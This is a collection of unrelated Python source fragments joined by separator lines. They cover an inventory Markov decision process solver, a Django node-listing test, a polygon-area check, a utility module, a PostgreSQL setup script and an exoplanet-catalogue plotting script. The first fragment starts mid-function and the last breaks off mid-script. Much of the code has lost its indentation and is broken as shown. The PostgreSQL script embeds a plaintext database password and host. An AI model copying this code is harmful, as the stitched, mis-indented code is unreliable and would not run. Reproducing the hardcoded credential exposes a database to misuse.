distr[0][j] = self.pmf[s + a - j]
distrdic[j_s] = distr[0][j]
else:
distr[0][j] = 1 - self.cdf[s + a - 1]
distrdic[j_s] = distr[0][j]
self.QQ[s, a] = distrdic
return distrdic
self.Q = Q
def build_distr(self):
for s in range(len(self.S)):
self.pmf[s] = self.dem_distr.pmf(s)
self.cdf[s] = self.dem_distr.cdf(s)
self.pmf[-1] = 0
self.cdf[-1] = 0
def reward(self, state, action=None):
"""
        Reward function for the inventory MDP.
Parameters
----------
state:
state
action:
Action
Returns
-------
float
the reward for the given (state, action) tuple.
"""
return self.rew[state, action]
def build_reward(self):
for s in self.S:
self.F[s] = sum(self.f(j) * self.dem_distr.pmf(j) for j in range(s)) \
+ self.f(s) * (1 - self.dem_distr.cdf(s - 1))
for a in self.adm_A(s):
if a not in self.O.keys():
self.O[a] = (self.K + self.c(a)) * int(a != 0)
if s + a not in self.F.keys():
self.F[s + a] = sum(self.f(j) * self.dem_distr.pmf(j) for j in range(s + a)) \
+ self.f(s + a) * (1 - self.dem_distr.cdf(s + a - 1))
self.rew[s, a] = self.F[s + a] - self.O[a] - self.h(s + a)
if self.lambda_e_1:
self.rew[s, a] *= (1 - self._lambda)
def plot_f1():
inv_mdp = base_case()
    V_VI = inv_mdp.iteration_counts['VI'].measures
    V_JAC = inv_mdp.iteration_counts['JAC'].measures
    V_GS = inv_mdp.iteration_counts['GS'].measures
    # distance of each iterate to the final (converged) iterate of its own method
    y1 = [norm(V_VI[-1] - v) for v in V_VI]
    y2 = [norm(V_JAC[-1] - v) for v in V_JAC]
    y3 = [norm(V_GS[-1] - v) for v in V_GS]
x1 = range(len(y1))
x2 = range(len(y2))
x3 = range(len(y3))
plt.plot(x1, y1, label='Value iteration')
plt.plot(x2, y2, label='Jacobi')
plt.plot(x3, y3, label='Gauss-Seidel')
plt.legend()
plt.xlabel(r'$n$')
plt.ylabel(r'$||v^n -v^*_\lambda||$')
plt.show()
def base_case(log=False):
def f(s):
return 10 * s
def c(a):
return 2 * a
def h(s):
return s
inv_space = inventorySpace(actions=A, states=S, dem_distr=dem_distr, M=M, f=f, c=c, h=h, K=K, _lambda=_lambda)
inv_mdp = infiniteTime(inv_space, _lambda)
v_0 = pt.zeros((len(S), 1))
pol_VI, v_VI = inv_mdp.solve(v_0, 0.001, improvement_method='VI')
pol_JAC, v_JAC = inv_mdp.solve(v_0, 0.001, improvement_method='JAC')
pol_GS , v_GS = inv_mdp.solve(v_0, 0.001, improvement_method='GS')
if log:
t_GS = inv_mdp.computing_times['GS'].total_time
for i, t in inv_mdp.computing_times.items():
print(i, round(t.total_time, 4), round(t.total_time / t_GS, 4), sep='&', end='\\\\ \n')
print(inv_mdp.iteration_counts, '\n')
print(f'VI - JAC: {norm(v_JAC - v_VI)}')
print(f'JAC - GS: {norm(v_GS - v_JAC)}')
print(f'VI - GS: {norm(v_GS - v_VI)}', '\n')
print(f'VI: ', pol_VI)
print(f'JAC: ', pol_JAC)
print(f'GS: ', pol_GS, '\n')
return inv_mdp
def alt_case(log=False):
def f(s):
return 10 * s
def c(a):
return 3 * a - 0.01 * a ** 2
def h(s):
return s
    inv_space = inventorySpace(actions=A, states=S, dem_distr=dem_distr, M=M, f=f, c=c, h=h, K=K, _lambda=_lambda)
    inv_mdp = infiniteTime(inv_space, _lambda)
v_0 = np.ones(shape=(len(S), 1))
inv_mdp._value_iteration(v_0, 0.001, improvement_method='VI')
v_VI = inv_mdp.v
pol_VI = inv_mdp.a_policy
inv_mdp._value_iteration(v_0, 0.001, improvement_method='JAC')
v_JAC = inv_mdp.v
pol_JAC = inv_mdp.a_policy
inv_mdp._value_iteration(v_0, 0.001, improvement_method='GS')
v_GS = inv_mdp.v
pol_GS = inv_mdp.a_policy
if log:
t_GS = inv_mdp.computing_times['GS'].total_time
for i, t in inv_mdp.computing_times.items():
print(i, round(t.total_time, 4), round(t.total_time / t_GS, 4), sep='&', end='\\\\ \n')
print(inv_mdp.iteration_counts, '\n')
print(f'VI - JAC: {norm(v_JAC - v_VI)}')
print(f'JAC - GS: {norm(v_GS - v_JAC)}')
print(f'VI - GS: {norm(v_GS - v_VI)}', '\n')
print(f'VI: ', pol_VI)
print(f'JAC: ', pol_JAC)
print(f'GS: ', pol_GS, '\n')
return inv_mdp
def changing_cost():
inv_mdp1 = base_case()
inv_mdp2 = alt_case()
plt.plot(inv_mdp1.S, inv_mdp1.v, label=r'$c(s)=2s$')
    plt.plot(inv_mdp2.S, inv_mdp2.v, label=r'$c(s)=3s - 0.01s^2$')
plt.legend()
    plt.xlabel('State')
plt.ylabel(r'$v^*_\lambda(s)$')
plt.show()
def cmap_plot():
fig = plt.figure(constrained_layout=True)
gs = fig.add_gridspec(1, 11)
ax = fig.add_subplot(gs[0, :10])
ax_c = fig.add_subplot(gs[0, 10:])
return fig, ax, ax_c
def _lambda_to_1(lb=0.9, ub=0.999):
cmap = cm.get_cmap('coolwarm', 256)
_Lambda = np.linspace(lb, ub, 30)
def f(s):
return 10 * s
def c(a):
return 3 * a - 0.01 * a ** 2
def h(s):
return s
MDPS = dict()
f1, ax1, ax1c = cmap_plot()
f2, ax2, ax2c = cmap_plot()
f3, ax3, ax3c = cmap_plot()
    T_T = Timer('With trick')
    T_F = Timer('Without trick')
for l in _Lambda:
print(l)
T_T.start()
        inv_space_t = inventorySpace(actions=A, states=S, dem_distr=dem_distr, M=M, f=f, c=c, h=h, K=K, _lambda=l, lambda_e_1=True)
        MDPS[l] = infiniteTime(inv_space_t, l)
MDPS[l]._value_iteration()
T_T.stop()
T_F.start()
        inv_space_f = inventorySpace(actions=A, states=S, dem_distr=dem_distr, M=M, f=f, c=c, h=h, K=K, _lambda=l, lambda_e_1=False)
        MDPS[l] = infiniteTime(inv_space_f, l)
MDPS[l]._value_iteration()
T_F.stop()
ax1.plot(MDPS[l].S, MDPS[l].v, c=cmap((l - lb) / (ub - lb)), label=r'$\lambda = $'+str(round(l, 4)))
ax2.plot(MDPS[l].S, MDPS[l].v * (1 - l), c=cmap((l - lb) / (ub - lb)), label=r'$\lambda = $'+str(round(l, 4)))
if l == lb:
c_pol = MDPS[l].a_policy
c_l = l
if MDPS[l].a_policy != c_pol:
c_u = l
i_0 = 0
for i in MDPS[l].space.S:
if c_pol[i] > 0:
i_0 = i
i_0 += 5
ax3.plot(range(i_0), list(c_pol.values())[:i_0], '-o',
c=cmap(((c_u + c_l) / 2 - lb) / (ub - lb)),
label=r'$\lambda \in$ ' + f'[{round(c_l, 3)}, {round(c_u, 3)})')
c_pol = MDPS[l].a_policy
c_l = c_u
i_0 = 0
for i in MDPS[l].space.S:
if c_pol[i] > 0:
i_0 = i
i_0 += 5
ax3.plot(range(i_0), list(c_pol.values())[:i_0], '-o',
c=cmap(((c_u + ub) / 2 - lb) / (ub - lb)),
label=r'$\lambda \in$ ' + f'[{round(c_l, 3)}, {round(ub, 3)}]')
norm = mpl.colors.Normalize(vmin=lb, vmax=ub)
mpl.colorbar.ColorbarBase(ax1c, cmap=cmap, norm=norm)
mpl.colorbar.ColorbarBase(ax2c, cmap=cmap, norm=norm)
mpl.colorbar.ColorbarBase(ax3c, cmap=cmap, norm=norm)
    ax1.set_xlabel('States')
    ax2.set_xlabel('States')
    ax3.set_xlabel('States')
    ax1.set_ylabel(r'$v^*_\lambda$')
    ax2.set_ylabel(r'$(1 - \lambda) v^*_\lambda$')
    ax3.set_ylabel('Action')
ax3.legend()
f4, ax4 = plt.subplots()
ax4.plot(_Lambda, [MDPS[l].computing_times['GS'].total_time for l in _Lambda])
ax4.set_xlabel(r'$\lambda$')
    ax4.set_ylabel(r'Computation time (s)')
    print(f'The total time saved is {(T_F.total_time - T_T.total_time)}, as a fraction {(T_F.total_time - T_T.total_time) / T_T.total_time}')
plt.show()
if __name__ == "__main__":
global M, A, S, K, _lambda, dem_distr, inv_space
M = 100
A = list(range(M + 1))
S = list(range(M + 1))
K = 2
_lambda = 0.9
dem_distr = poisson(mu=10)
base_case(True)
|
import json
from io import StringIO
import pytest
from django.core.management import call_command
from node.core.utils.cryptography import get_node_identifier
@pytest.mark.usefixtures('rich_blockchain')
def test_list_nodes(test_server_address, force_smart_mocked_node_client):
out = StringIO()
call_command('list_nodes', test_server_address, stdout=out)
assert json.loads(out.getvalue().rstrip('\n')) == [{
'addresses': ['http://not-existing-node-address-674898923.com:8555/'],
'fee': 4,
'identifier': '1c8e5f54a15b63a9f3d540ce505fd0799575ffeaac62ce625c917e6d915ea8bb',
}, {
'addresses': ['http://not-existing-confirmation-validator-2-address-674898923.com:8555/'],
'fee': 4,
'identifier': '5db9a262236cc148fd2adf841dbe0967e9bfe77e5e482dc7e0ef0c59d7fb56cf',
}, {
'addresses': ['http://not-existing-self-address-674898923.com:8555/', test_server_address],
'fee': 4,
'identifier': get_node_identifier(),
}, {
'addresses': ['http://not-existing-primary-validator-address-674898923.com:8555/'],
'fee': 4,
'identifier': 'b9dc49411424cce606d27eeaa8d74cb84826d8a1001d17603638b73bdc6077f1',
}, {
'addresses': ['http://not-existing-confirmation-validator-address-674898923.com:8555/'],
'fee': 4,
'identifier': 'd171de280d593efc740e4854ee2d2bd658cd1deb967eb51a02b89c6e636f46e1',
}]
@pytest.mark.django_db
def test_list_nodes_when_no_nodes(test_server_address, force_smart_mocked_node_client):
out = StringIO()
call_command('list_nodes', test_server_address, stdout=out)
assert json.loads(out.getvalue().rstrip('\n')) == []
|
from multimodal.image_analysis import ImageAnalysisCache
IMAGE_ANALYSIS_CACHE = ImageAnalysisCache.load()
|
def twoPolygons(p1, p2):
def doubleSquare(polygon):
square = 0
for i in range(len(polygon)):
a = polygon[i]
b = polygon[(i + 1) % len(polygon)]
square += a[0] * b[1] - a[1] * b[0]
return square
return doubleSquare(p1) == doubleSquare(p2)
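# A quick illustrative check: both triangles below have the same signed, doubled
# shoelace area (12), so the comparison returns True; note that the function
# compares signed areas, so vertex orientation matters.
assert twoPolygons([(0, 0), (4, 0), (0, 3)], [(0, 0), (6, 0), (0, 2)]) is True
assert twoPolygons([(0, 0), (1, 0), (0, 1)], [(0, 0), (2, 0), (0, 2)]) is False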
|
from contextlib import contextmanager
import itertools
import json
import os
import signal
from typing import Dict, List, Union, Any, Tuple
from .exceptions import AdamaError
def location_of(filename):
return os.path.dirname(os.path.abspath(filename))
def interleave(a, b):
    """ '+', [1, 2, 3] -> [1, '+', 2, '+', 3] """
    b = iter(b)
    yield next(b)
    for x, y in zip(itertools.cycle(a), b):
        yield x
        yield y
class TimeoutFunctionException(Exception):
"""Exception to raise on a timeout"""
pass
class TimeoutFunction:
def __init__(self, function, timeout):
self.timeout = timeout
self.function = function
def handle_timeout(self, signum, frame):
raise TimeoutFunctionException()
def __call__(self, *args, **kwargs):
if self.timeout:
old = signal.signal(signal.SIGALRM, self.handle_timeout)
signal.setitimer(signal.ITIMER_REAL, self.timeout, 1)
try:
return self.function(*args, **kwargs)
finally:
if self.timeout:
signal.signal(signal.SIGALRM, old)
signal.setitimer(signal.ITIMER_REAL, 0, 0)
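# A minimal usage sketch for TimeoutFunction (Unix-only, since it relies on
# SIGALRM; the wrapped callable and timeout value here are illustrative):
#
#     slow = TimeoutFunction(lambda: sum(x * x for x in range(10 ** 8)), timeout=0.5)
#     try:
#         slow()
#     except TimeoutFunctionException:
#         print('timed out')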
def identifier(namespace, name, version):
return service_iden(namespace, adapter_iden(name, version))
def adapter_iden(name, version):
return '{}_v{}'.format(name, version)
def service_iden(namespace, service):
return '{}.{}'.format(namespace, service)
def namespace_of(identifier):
return identifier.split('.')[0]
@contextmanager
def chdir(directory):
old_wd = os.getcwd()
try:
os.chdir(directory)
yield
finally:
os.chdir(old_wd)
def node(role: str) -> Dict[str, Any]:
try:
with open('/serfnode/serfnodes_by_role.json') as nodes_file:
all_nodes = json.load(nodes_file)
nodes = all_nodes[role]
nodes.sort(key=lambda obj: float(obj['timestamp']))
return nodes[0]
except KeyError:
raise AdamaError('could not find node with role "{}"'.format(role))
except FileNotFoundError:
        raise AdamaError('missing info from parent at "/serfnode/serfnodes_by_role.json"')
except ValueError:
raise AdamaError('invalid JSON object received from parent')
def location(role: str, port: int) -> Tuple[str, int]:
info = node(role)
try:
port = int(info['ports']['{}/tcp'.format(port)][0])
except KeyError:
raise AdamaError('port {}/tcp not found for role {}'
.format(port, role))
return info['service_ip'], port
|
import psycopg2
dbname = 'vvqfwreu'
user = 'vvqfwreu'
password = 'x2V1_pasp_QsYLoNKDjsAUyUyRV1WDui'
host = 'ruby.db.elephantsql.com'
pg_conn = psycopg2.connect(dbname = dbname, user = user,
password = password, host = host)
pg_curs = pg_conn.cursor()
create_table_statement = """
CREATE TABLE test_table (
Id SERIAL PRIMARY KEY,
name varchar(40) NOT NULL,
data JSONB
);
"""
pg_curs.execute(create_table_statement)
pg_conn.commit()
insert_statement = """
INSERT INTO test_table (name, data) VALUES
(
'A row name',
null
),
(
'Another row, with JSON this time',
'{ "a": 1, "b": ["dog", "cat", 42], "c": true }'::JSONB
)
"""
pg_curs.execute(insert_statement)
pg_conn.commit()
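# A short follow-up sketch: read back the rows inserted above and release the
# connection (the column names match the CREATE TABLE statement).
pg_curs.execute('SELECT name, data FROM test_table;')
for name, data in pg_curs.fetchall():
    print(name, data)
pg_curs.close()
pg_conn.close()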
|
# To import required modules:
import numpy as np
import time
import os
import sys
import matplotlib
import matplotlib.cm as cm #for color maps
import matplotlib.pyplot as plt
from matplotlib.gridspec import GridSpec #for specifying plot attributes
from matplotlib import ticker #for setting contour plots to log scale
import scipy.integrate #for numerical integration
import scipy.misc #for factorial function
from scipy.special import erf #error function, used in computing CDF of normal distribution
import scipy.interpolate #for interpolation functions
from scipy.stats import gaussian_kde as KDE #for gaussian_kde functions
import corner #corner.py package for corner plots
#matplotlib.rc('text', usetex=True)
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
from src.functions_general import *
from src.functions_compare_kepler import *
from src.functions_load_sims import *
from src.functions_plot_catalogs import *
from src.functions_plot_params import *
savefigures = False
loadfiles_directory = '/Users/hematthi/Documents/GradSchool/Research/ACI/Simulated_Data/Split_stars/Clustered_P_R_fswp_bprp/Params13_KS/durations_KS/GP_med/'
#loadfiles_directory = '../../ACI/Simulated_Data/AMD_system/Split_stars/Singles_ecc/Params11_KS/durations_norm_circ_singles_multis_GF2020_KS/GP_med/'
savefigures_directory = '/Users/hematthi/Documents/GradSchool/Research/ExoplanetsSysSim_Clusters/Figures/Model_Optimization/Split_stars/Clustered_P_R_fswp_bprp/Params13_KS/durations_KS/Best_models/GP_best_models/'
#savefigures_directory = '../Figures/Model_Optimization/AMD_system/Split_stars/Singles_ecc/Params11_KS/durations_norm_circ_singles_multis_GF2020_KS/Best_models/GP_best_models/'
run_number = ''
model_name = 'Clustered_P_R_Model' + run_number
compute_ratios = compute_ratios_adjacent
AD_mod = True
weights_all = load_split_stars_weights_only()
dists_include = ['delta_f',
'mult_CRPD_r',
'periods_KS',
'period_ratios_KS',
'durations_KS',
#'durations_norm_circ_KS',
#'durations_norm_circ_singles_KS',
#'durations_norm_circ_multis_KS',
'duration_ratios_nonmmr_KS',
'duration_ratios_mmr_KS',
'depths_KS',
'radius_ratios_KS',
#'radii_partitioning_KS',
#'radii_monotonicity_KS',
#'gap_complexity_KS',
]
##### To load the files with the systems with observed planets:
# To first read the number of simulated targets and bounds for the periods and radii:
N_sim, cos_factor, P_min, P_max, radii_min, radii_max = read_targets_period_radius_bounds(loadfiles_directory + 'periods%s.out' % run_number)
# To read the simulation parameters from the file:
param_vals = read_sim_params(loadfiles_directory + 'periods%s.out' % run_number)
# To load and process the observed Kepler catalog and compare with our simulated catalog:
stars_cleaned = load_Kepler_stars_cleaned()
Rstar_med = np.nanmedian(stars_cleaned['radius'])
Mstar_med = np.nanmedian(stars_cleaned['mass'])
teff_med = np.nanmedian(stars_cleaned['teff'])
#bp_rp_med = np.nanmedian(stars_cleaned['bp_rp'])
bp_rp_corr_med = np.nanmedian(stars_cleaned['bp_rp'] - stars_cleaned['e_bp_rp_interp'])
ssk_per_sys0, ssk0 = compute_summary_stats_from_Kepler_catalog(P_min, P_max, radii_min, radii_max) # combined sample
ssk_per_sys1, ssk1 = compute_summary_stats_from_Kepler_catalog(P_min, P_max, radii_min, radii_max, bp_rp_max=bp_rp_corr_med) #_max=_med
ssk_per_sys2, ssk2 = compute_summary_stats_from_Kepler_catalog(P_min, P_max, radii_min, radii_max, bp_rp_min=bp_rp_corr_med) #_min=_med
sss_per_sys0, sss0 = compute_summary_stats_from_cat_obs(file_name_path=loadfiles_directory, run_number=run_number, compute_ratios=compute_ratios) # combined sample
sss_per_sys1, sss1 = compute_summary_stats_from_cat_obs(file_name_path=loadfiles_directory, run_number=run_number, bp_rp_max=bp_rp_corr_med, compute_ratios=compute_ratios)
sss_per_sys2, sss2 = compute_summary_stats_from_cat_obs(file_name_path=loadfiles_directory, run_number=run_number, bp_rp_min=bp_rp_corr_med, compute_ratios=compute_ratios)
label1, label2 = 'bluer', 'redder'
split_sss = [sss1, sss2]
split_sss_per_sys = [sss_per_sys1, sss_per_sys2]
split_ssk = [ssk1, ssk2]
split_ssk_per_sys = [ssk_per_sys1, ssk_per_sys2]
split_names = [label1, label2]
split_linestyles = ['-', '-']
split_colors = ['b', 'r']
dists0, dists_w0 = compute_distances_sim_Kepler(sss_per_sys0, sss0, ssk_per_sys0, ssk0, weights_all['all'], dists_include, N_sim, cos_factor=cos_factor, AD_mod=AD_mod, compute_ratios=compute_ratios)
dists1, dists_w1 = compute_distances_sim_Kepler(sss_per_sys1, sss1, ssk_per_sys1, ssk1, weights_all['bluer'], dists_include, N_sim, cos_factor=cos_factor, AD_mod=AD_mod, compute_ratios=compute_ratios)
dists2, dists_w2 = compute_distances_sim_Kepler(sss_per_sys2, sss2, ssk_per_sys2, ssk2, weights_all['redder'], dists_include, N_sim, cos_factor=cos_factor, AD_mod=AD_mod, compute_ratios=compute_ratios)
#'''
##### To first compute the KDE objects for each marginal distribution from Kepler:
sample_names = ['all', 'bluer', 'redder']
ssk_samples = {'all': ssk0, 'bluer': ssk1, 'redder': ssk2}
ssk_per_sys_samples = {'all': ssk_per_sys0, 'bluer': ssk_per_sys1, 'redder': ssk_per_sys2}
P_kde_Kep = {sample: KDE(np.log10(ssk_samples[sample]['P_obs'])) for sample in sample_names}
Rm_kde_Kep = {sample: KDE(np.log10(ssk_samples[sample]['Rm_obs'])) for sample in sample_names}
tdur_kde_Kep = {sample: KDE(ssk_samples[sample]['tdur_obs']) for sample in sample_names}
tdur_tcirc_1_kde_Kep = {sample: KDE(ssk_samples[sample]['tdur_tcirc_1_obs']) for sample in sample_names}
tdur_tcirc_2p_kde_Kep = {sample: KDE(ssk_samples[sample]['tdur_tcirc_2p_obs']) for sample in sample_names}
D_kde_Kep = {sample: KDE(np.log10(ssk_samples[sample]['D_obs'])) for sample in sample_names}
radii_kde_Kep = {sample: KDE(ssk_samples[sample]['radii_obs']) for sample in sample_names}
Rstar_kde_Kep = {sample: KDE(ssk_samples[sample]['Rstar_obs']) for sample in sample_names}
D_ratio_kde_Kep = {sample: KDE(np.log10(ssk_samples[sample]['D_ratio_obs'])) for sample in sample_names}
xi_Kep = {sample: np.log10(ssk_samples[sample]['xi_obs']) for sample in sample_names}
xi_kde_Kep = {sample: KDE(xi_Kep[sample][np.isfinite(xi_Kep[sample])]) for sample in sample_names}
xi_res_Kep = {sample: np.log10(ssk_samples[sample]['xi_res_obs']) for sample in sample_names}
xi_res_kde_Kep = {sample: KDE(xi_res_Kep[sample][np.isfinite(xi_res_Kep[sample])]) for sample in sample_names}
xi_nonres_Kep = {sample: np.log10(ssk_samples[sample]['xi_nonres_obs']) for sample in sample_names}
xi_nonres_kde_Kep = {sample: KDE(xi_nonres_Kep[sample][np.isfinite(xi_nonres_Kep[sample])]) for sample in sample_names}
radii_partitioning_kde_Kep = {sample: KDE(np.log10(ssk_per_sys_samples[sample]['radii_partitioning'])) for sample in sample_names}
radii_monotonicity_kde_Kep = {sample: KDE(ssk_per_sys_samples[sample]['radii_monotonicity']) for sample in sample_names}
gap_complexity_kde_Kep = {sample: KDE(ssk_per_sys_samples[sample]['gap_complexity']) for sample in sample_names}
##### To load and compute the KDE objects for a large number of models:
loadfiles_directory = '/Users/hematthi/Documents/GradSchool/Research/ACI/Simulated_Data/Split_stars/Clustered_P_R_fswp_bprp/Params13_KS/durations_KS/GP_best_models/'
#loadfiles_directory = '../../ACI/Simulated_Data/AMD_system/Split_stars/Singles_ecc/Params11_KS/durations_norm_circ_singles_multis_GF2020_KS/GP_best_models/'
runs = 100
param_vals_all = []
Mtot_bins = np.arange(10)-0.5
Mtot_bins_mid = (Mtot_bins[:-1] + Mtot_bins[1:])/2.
Mtot_counts_all = {sample: [] for sample in sample_names}
Mtot_normed_counts_all = {sample: [] for sample in sample_names}
P_kde_all = {sample: [] for sample in sample_names} # kde on log values
Rm_kde_all = {sample: [] for sample in sample_names} # kde on log values
tdur_kde_all = {sample: [] for sample in sample_names}
tdur_tcirc_1_kde_all = {sample: [] for sample in sample_names}
tdur_tcirc_2p_kde_all = {sample: [] for sample in sample_names}
D_kde_all = {sample: [] for sample in sample_names} # kde on log values
radii_kde_all = {sample: [] for sample in sample_names}
Rstar_kde_all = {sample: [] for sample in sample_names}
D_ratio_kde_all = {sample: [] for sample in sample_names} # kde on log values
xi_kde_all = {sample: [] for sample in sample_names}
xi_res_kde_all = {sample: [] for sample in sample_names}
xi_nonres_kde_all = {sample: [] for sample in sample_names}
radii_partitioning_kde_all = {sample: [] for sample in sample_names} # kde on log values
radii_monotonicity_kde_all = {sample: [] for sample in sample_names}
gap_complexity_kde_all = {sample: [] for sample in sample_names}
for i in range(1,runs+1): #range(1,runs+1)
run_number = i
print(i)
param_vals_i = read_sim_params(loadfiles_directory + 'periods%s.out' % run_number)
param_vals_all.append(param_vals_i)
sss_per_sys0_i, sss0_i = compute_summary_stats_from_cat_obs(file_name_path=loadfiles_directory, run_number=run_number, compute_ratios=compute_ratios) # combined sample
sss_per_sys1_i, sss1_i = compute_summary_stats_from_cat_obs(file_name_path=loadfiles_directory, run_number=run_number, bp_rp_max=bp_rp_corr_med, compute_ratios=compute_ratios)
sss_per_sys2_i, sss2_i = compute_summary_stats_from_cat_obs(file_name_path=loadfiles_directory, run_number=run_number, bp_rp_min=bp_rp_corr_med, compute_ratios=compute_ratios)
dists0_i, dists_w0_i = compute_distances_sim_Kepler(sss_per_sys0_i, sss0_i, ssk_per_sys0, ssk0, weights_all['all'], dists_include, N_Kep, cos_factor=cos_factor, AD_mod=AD_mod, compute_ratios=compute_ratios)
dists1_i, dists_w1_i = compute_distances_sim_Kepler(sss_per_sys1_i, sss1_i, ssk_per_sys1, ssk1, weights_all['bluer'], dists_include, N_Kep, cos_factor=cos_factor, AD_mod=AD_mod, compute_ratios=compute_ratios)
dists2_i, dists_w2_i = compute_distances_sim_Kepler(sss_per_sys2_i, sss2_i, ssk_per_sys2, ssk2, weights_all['redder'], dists_include, N_Kep, cos_factor=cos_factor, AD_mod=AD_mod, compute_ratios=compute_ratios)
samples_sss_per_sys_i = {'all': sss_per_sys0_i, 'bluer': sss_per_sys1_i, 'redder': sss_per_sys2_i}
samples_sss_i = {'all': sss0_i, 'bluer': sss1_i, 'redder': sss2_i}
for sample in sample_names:
# Multiplicities:
counts, bins = np.histogram(samples_sss_per_sys_i[sample]['Mtot_obs'], bins=Mtot_bins)
Mtot_counts_all[sample].append(counts)
Mtot_normed_counts_all[sample].append(counts/float(np.sum(counts)))
# Periods:
P_kde = KDE(np.log10(samples_sss_i[sample]['P_obs']))
P_kde_all[sample].append(P_kde)
# Period ratios:
Rm_kde = KDE(np.log10(samples_sss_i[sample]['Rm_obs']))
Rm_kde_all[sample].append(Rm_kde)
# Durations:
tdur_kde = KDE(samples_sss_i[sample]['tdur_obs'])
tdur_kde_all[sample].append(tdur_kde)
# Circular normalized durations (singles and multis):
tdur_tcirc_1_kde = KDE(samples_sss_i[sample]['tdur_tcirc_1_obs'])
tdur_tcirc_2p_kde = KDE(samples_sss_i[sample]['tdur_tcirc_2p_obs'])
tdur_tcirc_1_kde_all[sample].append(tdur_tcirc_1_kde)
tdur_tcirc_2p_kde_all[sample].append(tdur_tcirc_2p_kde)
# Depths:
D_kde = KDE(np.log10(samples_sss_i[sample]['D_obs']))
D_kde_all[sample].append(D_kde)
# Planet radii:
radii_kde = KDE(samples_sss_i[sample]['radii_obs'])
radii_kde_all[sample].append(radii_kde)
# Stellar radii:
Rstar_kde = KDE(samples_sss_i[sample]['Rstar_obs'])
Rstar_kde_all[sample].append(Rstar_kde)
# Depth ratios:
D_ratio_kde = KDE(np.log10(samples_sss_i[sample]['D_ratio_obs']))
D_ratio_kde_all[sample].append(D_ratio_kde)
# Log(xi):
xi = np.log10(samples_sss_i[sample]['xi_obs'])
xi_kde = KDE(xi[np.isfinite(xi)])
xi_kde_all[sample].append(xi_kde)
# Log(xi) (res):
xi_res = np.log10(samples_sss_i[sample]['xi_res_obs'])
xi_res_kde = KDE(xi_res[np.isfinite(xi_res)])
xi_res_kde_all[sample].append(xi_res_kde)
# Log(xi) (non-res):
xi_nonres = np.log10(samples_sss_i[sample]['xi_nonres_obs'])
xi_nonres_kde = KDE(xi_nonres[np.isfinite(xi_nonres)])
xi_nonres_kde_all[sample].append(xi_nonres_kde)
# Radii partitioning:
radii_partitioning_kde = KDE(np.log10(samples_sss_per_sys_i[sample]['radii_partitioning']))
radii_partitioning_kde_all[sample].append(radii_partitioning_kde)
# Radii monotonicity:
radii_monotonicity_kde = KDE(samples_sss_per_sys_i[sample]['radii_monotonicity'])
radii_monotonicity_kde_all[sample].append(radii_monotonicity_kde)
# Gap complexity:
gap_complexity_kde = KDE(samples_sss_per_sys_i[sample]['gap_complexity'])
gap_complexity_kde_all[sample].append(gap_complexity_kde)
for sample in sample_names:
Mtot_counts_all[sample] = np.array(Mtot_counts_all[sample])
Mtot_counts_16, Mtot_counts_84 = {sample: np.zeros(len(Mtot_bins_mid)) for sample in sample_names}, {sample: np.zeros(len(Mtot_bins_mid)) for sample in sample_names}
for b in range(len(Mtot_bins_mid)):
for sample in sample_names:
counts_bin_sorted = np.sort(Mtot_counts_all[sample][:,b])
Mtot_counts_16[sample][b], Mtot_counts_84[sample][b] = counts_bin_sorted[16], counts_bin_sorted[84]
##### To plot the simulated and Kepler catalogs as KDEs:
subdirectory = 'Remake_for_PaperII/kde_lines/kNN_bw/' #'Remake_for_PaperII/kde_shaded/'
fig_size = (8,6) #(8,3) # size of each panel (figure)
fig_lbrt = [0.15, 0.15, 0.95, 0.95] #[0.15, 0.3, 0.95, 0.925]
pts = 201 # number of points to evaluate each kde
kNN_factor = 5 # len(data)/kNN_factor = k Nearest Neighbors
lw_Kep = 3 # linewidth
lw_sim = 0.1
alpha = 0.2 # transparency of histograms
afs = 20 # axes labels font size
tfs = 20 # text labels font size
lfs = 16 # legend labels font size
# Function to compute the KDE using an adaptive bandwidth (kNN):
def kde_kNN_bw(kde, x_axis, kNN_factor=5):
# Compute the KDE along an axis ('x_axis') given a KDE object ('kde') with adaptive bandwidth using k nearest neighbors (kNN), where kNN = (number of data points)/kNN_factor
kde_pts, bw_pts = np.zeros(len(x_axis)), np.zeros(len(x_axis))
x_data = kde.dataset[0]
kNN = int(np.round(len(x_data)/kNN_factor)) # number of nearest neighbors
for p,x in enumerate(x_axis):
idx_kNN = np.argsort(np.abs(x_data - x))[:kNN] # indices of kNN
x_kNN = x_data[idx_kNN] # kNN points
bw = np.max(x_kNN) - np.min(x_kNN) # bandwidth as range of kNN points
kde.set_bandwidth(bw_method=bw)
kde_pts[p] = kde(x)[0] # evaluate KDE at point
bw_pts[p] = bw
return kde_pts, bw_pts
# To make a 'plot' listing the model parameters:
fig = plt.figure(figsize=fig_size)
plot = GridSpec(1,1,left=fig_lbrt[0],bottom=fig_lbrt[1],right=fig_lbrt[2],top=fig_lbrt[3],wspace=0.1,hspace=0.1)
nrows = 8
for i,param in enumerate(param_vals):
plt.figtext(x=0.05+0.35*int(i/float(nrows)), y=0.875-0.1*(i%nrows), s=r'%s = %s' % (param_symbols[param], np.round(param_vals[param],3)), fontsize=lfs)
if savefigures == True:
plt.savefig(savefigures_directory + subdirectory + model_name + '_sim_params.pdf')
plt.close()
# Multiplicities:
plot_fig_counts_hist_simple(fig_size, [sss_per_sys['Mtot_obs'] for sss_per_sys in split_sss_per_sys], [ssk_per_sys['Mtot_obs'] for ssk_per_sys in split_ssk_per_sys], x_min=0, x_llim=0.5, normalize=False, N_sim_Kep_factor=float(N_sim)/N_Kep, log_y=True, c_sim=split_colors, c_Kep=split_colors, ls_sim=split_linestyles, ms_Kep=['x','x'], lw=1, labels_sim=['Simulated',None], labels_Kep=['Kepler', None], xlabel_text='Observed planets per system', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
label_this = r'16% and 84%' if i==0 else None
plt.plot(Mtot_bins_mid, Mtot_counts_16[sample], drawstyle='steps-mid', color=split_colors[i], lw=1, ls='--', label=label_this)
plt.plot(Mtot_bins_mid, Mtot_counts_84[sample], drawstyle='steps-mid', color=split_colors[i], lw=1, ls='--')
plt.legend(loc='lower left', bbox_to_anchor=(0.01,0.01), ncol=1, frameon=False, fontsize=lfs) #show the legend
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_multiplicities_compare.pdf')
plt.close()
# Periods:
P_axis = np.logspace(np.log10(P_min), np.log10(P_max), pts)
